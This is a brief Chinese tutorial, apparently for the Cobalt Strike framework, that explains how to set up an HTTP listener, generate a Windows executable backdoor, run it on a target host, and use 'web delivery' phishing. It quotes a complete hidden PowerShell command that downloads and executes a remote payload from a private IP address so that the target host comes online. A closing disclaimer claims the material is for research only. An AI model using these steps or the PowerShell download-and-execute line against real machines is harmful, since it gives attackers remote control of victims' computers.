一、添加监听器
1、点击菜单栏下面那个耳机的图标,出现监听器选项卡,然后点击添加
2、修改关键参数,填写服务端的ip地址192.168.0.108,HTTP上线端口可以是任意端口,这里改为8888,然后点击保存
3、自动将监听器添加到下面的选项卡里
二、生成后门
1、点击攻击,选择生成后门,再选择Windows可执行程序(E)
2、点击选择按钮,添加上一步生成的名为ayou的监听器,点击选择,然后回到对话框,再点击生成。
三、获取目标主机
将生成的exe文件,在目标主机上运行,获取目标主机信息
四、web钓鱼
1、点击攻击,选择web钓鱼(W),选择web投递(Stageless)
2、选择上一步生成的名为aiyou的监听器,然后点击运行
3、会程程一条命令,让目标主机通过powershell执行该命令
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.108:80/a'))"
4、主机成功上线
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。
